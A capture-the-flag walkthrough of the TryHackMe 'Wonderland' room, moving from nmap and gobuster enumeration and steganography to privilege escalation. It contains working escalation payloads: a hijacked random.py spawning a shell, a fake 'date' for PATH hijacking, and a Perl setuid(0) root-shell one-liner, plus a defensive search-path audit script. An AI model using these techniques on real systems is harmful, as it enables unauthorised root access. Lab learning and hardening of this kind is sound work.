Wonderland

Updated on 2020-06-18

Fall down the rabbit hole and enter wonderland.

Difficulty: Medium

Room: Wonderland

Created by: NinjaJc01

Standard nmap scan

nmap -p- -T4 -sC -sV -vvv -oA nmap/scan $IP

```
🚀 nmap -p- -T4 -sC -sV -vvv -oA nmap/scan $IP
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDe20sKMgKSMTnyRTmZhXPxn+xLggGUemXZLJDkaGAkZSMgwM3taNTc8OaEku7BvbOkqoIya4ZI8vLuNdMnESFfB22kMWfkoB0zKCSWzaiOjvdMBw559UkLCZ3bgwDY2RudNYq5YEwtqQMFgeRCC1/rO4h4Hl0YjLJufYOoIbK0EPaClcDPYjp+E1xpbn3kqKMhyWDvfZ2ltU1Et2MkhmtJ6TH2HA+eFdyMEQ5SqX6aASSXM7OoUHwJJmptyr2aNeUXiytv7uwWHkIqk3vVrZBXsyjW4ebxC3v0/Oqd73UWd5epuNbYbBNls06YZDVI8wyZ0eYGKwjtogg5+h82rnWN
|   256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHH2gIouNdIhId0iND9UFQByJZcff2CXQ5Esgx1L96L50cYaArAW3A3YP3VDg4tePrpavcPJC2IDonroSEeGj6M=
|   256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAsWAdr9g04J7Q8aeiWYg03WjPqGVS6aNf/LF+/hMyKh
80/tcp open  http    syn-ack ttl 63 Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Follow the white rabbit.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

The initial scan shows HTTP on port 80 and SSH on port 22.


Gobuster finds three directories with directory-list-2.3-medium.txt. We can ignore the odd http%3A%2F%2Fwww results. Let’s check out these directories in a browser.

```
🚀 gobuster dir -u http://$IP/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://$IP/
[+] Threads:        100
[+] Wordlist:       /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================

===============================================================
/img (Status: 301)
/r (Status: 301)
/poem (Status: 301)
/http%3A%2F%2Fwww (Status: 301)
/http%3A%2F%2Fyoutube (Status: 301)
/http%3A%2F%2Fblogs (Status: 301)
/http%3A%2F%2Fblog (Status: 301)
/**http%3A%2F%2Fwww (Status: 301)
/http%3A%2F%2Fcommunity (Status: 301)
/http%3A%2F%2Fradar (Status: 301)
/http%3A%2F%2Fjeremiahgrossman (Status: 301)
/http%3A%2F%2Fweblog (Status: 301)
/http%3A%2F%2Fswik (Status: 301)
===============================================================

===============================================================
```

Viewing alice_door.jpg and alice_door.png, we notice the images are practically the same, but it looks like a filter was applied, which could indicate steganography. Typically I run binwalk -e or use something like stegoveritas (stegoVeritas repo). Since steghide is included in Kali’s base image, we’ll use that.

/images/wonderland/img.png

We find hint.txt in white_rabbit_1.jpeg.

```
🚀 steghide extract -sf white_rabbit_1.jpeg
Enter passphrase:
wrote extracted data to "hint.txt".

🚀 cat hint.txt
follow the r a b b i t#
```

Follow the r a b b i t … Interesting. We’ll keep this in our back pocket.

Navigating to /r, we are given a clue: Keep going.

This probably hints that we have more enumeration to do. Looking at the source, we don’t find any more hints. Let’s run another gobuster scan, but append /r/ to the URL.

/images/wonderland/r.png
```
🚀 gobuster dir -u http://$IP/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://$IP/
[+] Threads:        100
[+] Wordlist:       /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================

===============================================================
/a (Status: 301)
/http%3A%2F%2Fwww (Status: 301)
/http%3A%2F%2Fyoutube (Status: 301)
/http%3A%2F%2Fblogs (Status: 301)
/http%3A%2F%2Fblog (Status: 301)
/**http%3A%2F%2Fwww (Status: 301)
/http%3A%2F%2Fcommunity (Status: 301)
/http%3A%2F%2Fradar (Status: 301)
/http%3A%2F%2Fjeremiahgrossman (Status: 301)
/http%3A%2F%2Fweblog (Status: 301)
/http%3A%2F%2Fswik (Status: 301)
===============================================================

===============================================================
```

If you haven’t figured it out yet, we’ll need to get to /r/a/b/b/i/t to find our next clue.

/images/wonderland/ra.png
/images/wonderland/rab.png
/images/wonderland/rabb.png


It looks like we finally found alice_door.png from /img. Let’s take a look at the source.

/images/wonderland/rabbit.png

We find our foothold: Alice’s credentials. Let’s get a shell as alice over SSH.

/images/wonderland/rabbit_source.png
/images/wonderland/alice_ls.png

What is root.txt doing here? We must be in Wonderland. This part tripped me up a little. Things must be reversed. Let’s see if we can read or write anything in /root.

/images/wonderland/alice_ls_root.png

Maybe user.txt is in /root?

/images/wonderland/user.png

Found user.txt!


Let’s see what we can run with sudo using sudo -l. Since NOPASSWD is not set in /etc/sudoers, we’ll need alice’s password.

/images/wonderland/alice_sudo_l.png

Interesting: we can run a Python script in our home directory as the user rabbit.

Looking at /etc/passwd, we have a few users.

```
root:x:0:0:root:/root:/bin/bash
tryhackme:x:1000:1000:tryhackme:/home/tryhackme:/bin/bash
alice:x:1001:1001:Alice Liddell,,,:/home/alice:/bin/bash
hatter:x:1003:1003:Mad Hatter,,,:/home/hatter:/bin/bash
rabbit:x:1002:1002:White Rabbit,,,:/home/rabbit:/bin/bash
```

The script runs a for loop and prints random lines of The Walrus and the Carpenter by Lewis Carroll. The lines are chosen using Python’s random library.

Although it’s not relevant for this box, I found it interesting that Lewis Carroll published The Alphabet Cipher in a magazine describing the Vigenère cipher. The Walrus and the Carpenter Wikipedia | The Alphabet Cipher

vim walrus_and_the_carpenter.py

```python
import random
poem = """The sun was shining on the sea,
Shining with all his might:
He did his very best to make
The billows smooth and bright —
And this was odd, because it was
The middle of the night.

The moon was shining sulkily,
Because she thought the sun
Had got no business to be there
After the day was done —
"It’s very rude of him," she said,
"To come and spoil the fun!"

The sea was wet as wet could be,
The sands were dry as dry.
You could not see a cloud, because
No cloud was in the sky:
No birds were flying over head —
There were no birds to fly.

The Walrus and the Carpenter
Were walking close at hand;
They wept like anything to see
Such quantities of sand:
"If this were only cleared away,"
They said, "it would be grand!"

"If seven maids with seven mops
Swept it for half a year,
Do you suppose," the Walrus said,
"That they could get it clear?"
"I doubt it," said the Carpenter,
And shed a bitter tear.

"O Oysters, come and walk with us!"
The Walrus did beseech.
"A pleasant walk, a pleasant talk,
Along the briny beach:
We cannot do with more than four,
To give a hand to each."

The eldest Oyster looked at him.
But never a word he said:
The eldest Oyster winked his eye,
And shook his heavy head —
Meaning to say he did not choose
To leave the oyster-bed.

But four young oysters hurried up,
All eager for the treat:
Their coats were brushed, their faces washed,
Their shoes were clean and neat —
And this was odd, because, you know,
They hadn’t any feet.

Four other Oysters followed them,
And yet another four;
And thick and fast they came at last,
And more, and more, and more —
All hopping through the frothy waves,
And scrambling to the shore.

The Walrus and the Carpenter
Walked on a mile or so,
And then they rested on a rock
Conveniently low:
And all the little Oysters stood
And waited in a row.

"The time has come," the Walrus said,
"To talk of many things:
Of shoes — and ships — and sealing-wax —
Of cabbages — and kings —
And why the sea is boiling hot —
And whether pigs have wings."

"But wait a bit," the Oysters cried,
"Before we have our chat;
For some of us are out of breath,
And all of us are fat!"
"No hurry!" said the Carpenter.
They thanked him much for that.

"A loaf of bread," the Walrus said,
"Is what we chiefly need:
Pepper and vinegar besides
Are very good indeed —
Now if you’re ready Oysters dear,
We can begin to feed."

"But not on us!" the Oysters cried,
Turning a little blue,
"After such kindness, that would be
A dismal thing to do!"
"The night is fine," the Walrus said
"Do you admire the view?

"It was so kind of you to come!
And you are very nice!"
The Carpenter said nothing but
"Cut us another slice:
I wish you were not quite so deaf —
I’ve had to ask you twice!"

"It seems a shame," the Walrus said,
"To play them such a trick,
After we’ve brought them out so far,
And made them trot so quick!"
The Carpenter said nothing but
"The butter’s spread too thick!"

"I weep for you," the Walrus said.
"I deeply sympathize."
With sobs and tears he sorted out
Those of the largest size.
Holding his pocket handkerchief
Before his streaming eyes.

"O Oysters," said the Carpenter.
"You’ve had a pleasant run!
Shall we be trotting home again?"
But answer came there none —
And that was scarcely odd, because
They’d eaten every one."""

for i in range(10):
    line = random.choice(poem.split("\n"))
    print("The line was:\t", line)
```

There’s really nothing we can do with this script in its current state, as it just prints random lines. Python library hijacking is just the job for this. I’ve included reading material below which describes this method. We’ll create our own random module that walrus_and_the_carpenter.py will import.

Python’s search path for modules is outlined in the documentation here: The Module Search Path

TLDR:

  1. The directory containing the input script (or the current directory when no file is specified).
  2. PYTHONPATH (a list of directory names, with the same syntax as the shell variable PATH).
  3. The installation-dependent default.

Option 1 is the one we’ll use: the directory containing the input script.

It’s really up to you what to put in random.py. I opted to just spawn a shell as rabbit, because we’re running this as rabbit.

```python
#!/usr/bin/python3.6
import pty
pty.spawn("/bin/bash")
```

```
alice@wonderland:~$ sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
```

/images/wonderland/rabbit_home.png

Download teaParty locally. Since we know alice’s password and have a shell as rabbit, you could chmod 777 /home/rabbit and scp it back to your machine, or copy the binary to alice’s home directory. Do you.

I used Ghidra for the decompiling and analysis. You could also do this with Cutter or whatever tool you like.

/images/wonderland/main.png

Looking at main, we see there’s a setuid and setgid to 1003, which is hatter. Then it echoes “Probably by ” followed by the time one hour from now, printed by date in RFC 5322 format (the -R flag).

```c
void main(void)
{
  setuid(0x3eb);   /* 0x3eb = 1003 = hatter */
  setgid(0x3eb);
  puts("Welcome to the tea party!\nThe Mad Hatter will be here soon.");
  /* date is looked up through PATH; /bin/echo is not */
  system("/bin/echo -n \'Probably by \' && date --date=\'next hour\' -R");
  puts("Ask very nicely, and I will give you some tea while you wait for him");
  getchar();
  puts("Segmentation fault (core dumped)");
  return;
}
```

We can use PATH manipulation since date is not called with an absolute path the way /bin/echo is. We can confirm teaParty is effectively making us hatter by creating a date that calls id and whoami. Notice from the id output that the gid is not actually 1003: setuid(1003) runs before setgid(1003), so by the time setgid is called the process has already dropped root and the call fails (its return value is never checked).

First we’ll want to prepend /home/rabbit to our PATH with PATH=/home/rabbit:$PATH.
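The two lookup orders this writeup leans on, the Python module search order for the sudo-run script and the PATH that system() walks for the bare date command, are the same class of weakness: an entry the invoking user controls sits ahead of the trusted one. The audit below is an added defender-side check, not part of the original writeup or the room; it replicates both orders and flags entries an unprivileged user could plant a file in. It assumes only root-owned directories count as trusted and that the paths in the usage line are the ones from this writeup.

```python
import os
import stat
import sys

def entry_reason(uid, mode, trusted_uids=(0,)):
    """Why could an unprivileged user plant a file in a directory with this owner and mode?"""
    if uid not in trusted_uids:
        return f"owned by uid {uid}, not a trusted uid"
    if mode & stat.S_IWOTH:  # sticky bit or not, anyone can still create new files here
        return "world-writable"
    if mode & stat.S_IWGRP:
        return "group-writable"
    return None

def audit_entries(entries, stop_at=None):
    """Walk search entries in order and report the untrusted ones. If stop_at names the
    file being looked up ('date', 'random.py'), stop at the first entry that already holds
    it: entries after that one can no longer shadow it."""
    findings = []
    for d in entries:
        try:
            st = os.stat(d)
        except OSError:
            continue  # entry does not exist; checking the parent is out of scope here
        reason = entry_reason(st.st_uid, st.st_mode)
        if reason:
            findings.append((d, reason))
        if stop_at and os.path.exists(os.path.join(d, stop_at)):
            break
    return findings

def python_search_order(script, pythonpath=None):
    """The order quoted above: script directory, PYTHONPATH, then the interpreter defaults."""
    if pythonpath is None:
        pythonpath = os.environ.get("PYTHONPATH", "")
    order = [os.path.dirname(os.path.abspath(script))]
    order += [p for p in pythonpath.split(os.pathsep) if p]
    order += [p for p in sys.path if p]
    return list(dict.fromkeys(order))  # de-duplicate, keeping the first occurrence

def shell_path_order(path_env):
    """Directories system()/execvp search for a bare command; an empty entry means cwd."""
    return [p or "." for p in path_env.split(os.pathsep)]

if __name__ == "__main__":
    script = sys.argv[1] if len(sys.argv) > 1 else "/home/alice/walrus_and_the_carpenter.py"
    for entry, why in audit_entries(python_search_order(script), stop_at="random.py"):
        print(f"module search: {entry}: {why}")
    for entry, why in audit_entries(shell_path_order(os.environ.get("PATH", "")), stop_at="date"):
        print(f"PATH lookup:   {entry}: {why}")
```

Run against the sudo rule from this box, the first line reported is alice’s home directory, which is exactly the entry the random.py trick relies on; run with the modified PATH, /home/rabbit is reported ahead of /bin.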

```sh
#!/bin/sh
id;
whoami;
```

Execute teaParty

/images/wonderland/teaparty_id.png

Now that we know we can become hatter, let’s create a fake date executable and see what’s in /home/hatter.

Make sure to chmod +x date before executing teaParty.

```sh
#!/bin/sh
ls -la /home/hatter
```

Execute teaParty

/images/wonderland/teaparty_ls.png

```sh
#!/bin/sh
cat /home/hatter/password.txt
```

Execute teaParty

/images/wonderland/teaparty_cat.png

We now have hatter’s password. Let’s SSH in as him.

From here I uploaded linPEAS and LinEnum, which led me to discover that the hatter group (id 1003) owns /usr/bin/perl5.26.1 and /usr/bin/perl. It’s probably something easily overlooked, but it’s important to enumerate things owned by the user’s group as well as which binaries have capabilities, with getcap -r / 2>/dev/null. Most automated enumeration scripts like linPEAS, LSE and LinEnum will search for this for you. Don’t overlook it, as it could be an easy path to root.

/images/wonderland/perl.png

RE: Perl GTFOBins - Capabilities

It can manipulate its process UID and can be used on Linux as a backdoor to maintain elevated privileges with the CAP_SETUID capability set. This also works when executed by another binary with the capability set.

Now that we know perl is capable of setting its UID to 0 (root), we can get a root shell and cat root.txt in /home/alice/.

```sh
/usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
```

/images/wonderland/root.png

This was a very fun challenge from NinjaJc01. As hackers, it can be easy to get caught up with immediate discoveries that ultimately lead you down rabbit holes. I believe going back to fundamentals and knowing when to move on is an important mindset to have.

Swissky (the creator of PayloadsAllTheThings) and contributors have compiled a clean but comprehensive checklist for Linux privesc. When I find myself hitting a wall or following the rabbit, as it were… I usually run through this checklist to find my bearings.

PayloadsAllTheThings Linux Privilege Escalation Checklist